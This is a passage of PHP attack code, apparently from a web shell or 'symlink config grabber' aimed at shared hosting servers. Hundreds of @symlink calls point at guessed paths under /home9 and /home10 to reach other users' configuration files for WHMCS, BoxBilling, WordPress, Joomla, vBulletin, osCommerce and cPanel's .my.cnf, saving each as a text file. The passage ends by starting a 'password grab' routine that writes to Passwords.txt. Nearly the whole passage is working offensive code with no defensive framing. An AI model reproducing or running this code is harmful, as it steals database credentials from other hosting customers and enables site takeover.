                                                                    @symlink('/home9/' . $user . '/public_html/Order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/CLIENT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/CLIENTAREA/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/SUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/BILLING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/BUY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/MANAGE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/CLIENTSUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/ClientSupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/CHECKOUT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/BASKET/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/SECURE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/SALES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/BILL/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/PURCHASE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/ACCOUNT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/USER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/User/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/user/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/CLIENTS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/MY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/My/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/my/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/secure/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/panel/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/clientes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/cliente/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/support/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/boxbilling/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/box/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/supportes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/support/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/hosting/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/cart/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/client/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/clients/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/cliente/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/clientes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/billing/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/billings/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/my/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/secure/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/support/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/products/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/cart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/supportes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/support/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/cart/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/client/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/clients/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/cliente/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/clientes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/my/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/secure/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/support/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home9/' . $user . '/.my.cnf', $user . '-Cpanel.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/po-content/config.php', $user . '-Popoji.txt');
                                                                    //home 10
                                                                    @symlink('/home10/' . $user . '/public_html/vb/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/forum/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/forums/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/cc/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/inc/config.php', $user . '-MyBB.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/shop/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/os/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/oscom/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/products/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/cart/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/inc/conf_global.php', $user . '-IPB.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/wp/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/blog/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/beta/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/portal/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/site/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/wp/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/WP/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/news/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/wordpress/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/demo/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/home/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/v1/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/v2/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/press/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/new/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/blogs/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/blog/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/submitticket.php', $user . '-^WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/cms/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/beta/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/portal/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/site/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/main/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/home/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/demo/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/test/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/v1/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/v2/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/joomla/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/new/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/WHMCS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/whmcs1/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/WHMC/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/WHM/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/HOST/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/SUPPORTES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/domains/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/domain/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/HOSTING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/CART/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/ORDER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/CLIENT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/CLIENTAREA/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/SUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/BILLING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/BUY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/MANAGE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/CLIENTSUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/ClientSupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/CHECKOUT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/BASKET/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/SECURE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/SALES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/BILL/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/PURCHASE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/ACCOUNT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/USER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/User/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/user/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/CLIENTS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/MY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/My/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/my/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/secure/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/panel/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/clientes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/cliente/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/support/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/boxbilling/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/box/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/supportes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/support/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/hosting/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/cart/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/client/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/clients/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/cliente/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/clientes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/billing/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/billings/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/my/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/secure/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/support/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/products/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/cart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/Host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/supportes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/support/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/cart/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/client/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/clients/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/cliente/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/clientes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/my/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/secure/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/support/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home10/' . $user . '/.my.cnf', $user . '-Cpanel.txt');
                                                                    @symlink('/home10/' . $user . '/public_html/po-content/config.php', $user . '-Popoji.txt');
                                                                }
                                                                //password grab
                                                                function entre2v2($text, $marqueurDebutLien, $marqueurFinLien) {
                                                                    $ar0 = explode($marqueurDebutLien, $text);
                                                                    $ar1 = explode($marqueurFinLien, $ar0[1]);
                                                                    $ar = trim($ar1[0]);
                                                                    return $ar;
                                                                }
                                                                $ffile = fopen('Passwords.txt', 'a+');
